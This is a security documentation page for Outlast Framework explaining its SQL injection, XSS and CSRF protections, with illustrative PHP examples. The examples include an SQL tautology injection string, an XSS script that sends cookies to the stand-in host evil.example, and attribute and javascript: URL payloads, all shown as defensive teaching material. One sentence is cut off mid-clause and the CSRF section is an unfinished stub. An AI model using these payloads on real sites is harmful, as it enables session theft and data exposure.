Built-in security features
SQL injection protection
Queries generated by Outlast Framework itself are protected against SQL injection, so in general you do not need to worry about it. The exception is custom SQL that you write yourself: there, any value that originates from a request (form fields, URL parameters, cookies, headers) must never be concatenated into the query string.
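The following added example (not the framework's own code; the page does not show the framework's query API, so plain PDO with an in-memory SQLite database is used instead, and the function names are made up for the illustration) shows what goes wrong in a hand-built custom query and how a bound parameter fixes it:

```php
<?php
// Added example: a custom query assembled by string concatenation versus the
// same query with a bound parameter. Requires the pdo_sqlite extension; the
// table, rows and attacker input below are constructed for the illustration.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)');
$db->exec("INSERT INTO users (username, role) VALUES ('alice', 'admin'), ('bob', 'user')");

// Constructed attacker input: closes the quoted literal and appends a condition
// that is true for every row.
$input = "nobody' OR '1'='1";

// Vulnerable (hypothetical helper): the request value becomes part of the SQL text,
// so the WHERE clause turns into a tautology and every user is returned.
function findUserUnsafe(PDO $db, string $username): array {
    $sql = "SELECT username, role FROM users WHERE username = '" . $username . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened (hypothetical helper): the value is sent as a parameter and is only ever
// compared as data, so the quote and the OR are part of the username being looked up.
function findUserSafe(PDO $db, string $username): array {
    $stmt = $db->prepare('SELECT username, role FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

printf("unsafe query matched %d row(s)\n", count(findUserUnsafe($db, $input)));
printf("safe query matched %d row(s)\n", count(findUserSafe($db, $input)));
```

The unsafe function matches both rows, the safe one none. Two caveats carry over to any custom query in the framework: escaping a value with a database escape function is a weaker substitute for binding, and neither approach can protect identifiers (table or column names) or ORDER BY directions, which must be checked against a fixed allow-list in PHP before they reach the SQL string.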
Cross-site scripting (XSS) protection
Cross-site scripting (XSS) enables attackers to inject client-side script into Web pages viewed by other users. XSS protection is built into Outlast Framework and enabled by default, so content is escaped on output unless you explicitly mark it as safe. To display content that is known to be safe without escaping you can use the |safe filter (see documentation), a filter that you should always use on
You can enable or disable XSS protection in site/index.php with the configuration setting:
$zajconf['feature_xss_protection_enabled'] = true;
Setting it to false turns escaping off for the whole site. If only a few values need to be output unescaped, keep the protection enabled and use the |safe filter on those values instead.
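The added example below (not the framework's template engine, only a stand-alone model of the behaviour described above; the function names are made up for the illustration) shows what default escaping does to attacker-controlled data, what applying |safe to that same data gives up, and one case that escaping alone does not cover:

```php
<?php
// Added example modelling default output escaping versus the |safe filter.
// Requires PHP 8 (str_starts_with). The values below are constructed attacker input.

$comment  = '<script>document.location="https://evil.example/?c="+document.cookie</script>';
$nickname = '" onmouseover="alert(1)';
$link     = 'javascript:alert(1)';

// Model of the default behaviour: every value is HTML-escaped on output.
// ENT_QUOTES matters: without it a double quote survives and can close an attribute.
function escapeOutput(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Model of a template variable with or without the |safe filter (hypothetical helper).
function renderVar(string $value, bool $safe = false): string {
    return $safe ? $value : escapeOutput($value);
}

// Escaping cannot help inside href/src, because "javascript:alert(1)" contains no
// special characters; the URL scheme has to be checked instead (hypothetical helper).
function safeHref(string $url): string {
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if ($scheme === false) {
        return '#';
    }
    $scheme = strtolower((string) $scheme);
    if ($scheme === 'http' || $scheme === 'https') {
        return escapeOutput($url);
    }
    // Allow site-relative paths, but not scheme-relative "//host" links.
    if ($scheme === '' && str_starts_with($url, '/') && !str_starts_with($url, '//')) {
        return escapeOutput($url);
    }
    return '#';
}

// Element body: escaped, the script tag is rendered as text; with |safe it executes.
echo '<p>' . renderVar($comment) . "</p>\n";
echo '<p>' . renderVar($comment, true) . "</p>\n";

// Attribute value: escaped, the quote cannot close the attribute; with |safe an
// event handler is injected.
echo '<a title="' . renderVar($nickname) . '">profile</a>' . "\n";
echo '<a title="' . renderVar($nickname, true) . '">profile</a>' . "\n";

// URL attribute: escaping leaves the javascript: URL intact, scheme check neutralises it.
echo '<a href="' . renderVar($link) . '">link</a>' . "\n";
echo '<a href="' . safeHref($link) . '">link</a>' . "\n";

// Where |safe belongs: markup you built yourself from already-escaped pieces.
$trusted = '<strong>' . escapeOutput($nickname) . '</strong>';
echo renderVar($trusted, true) . "\n";
```

The practical rule this illustrates: |safe is for markup the application itself produced or that has been through an allow-list HTML sanitizer, never for raw request data, and even with escaping on, values placed in URL attributes or inside inline JavaScript need their own context-specific check.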
Cross-site request forgery (CSRF) protection
Cross-site request forgery (CSRF) is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user's Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
[todo: add docs]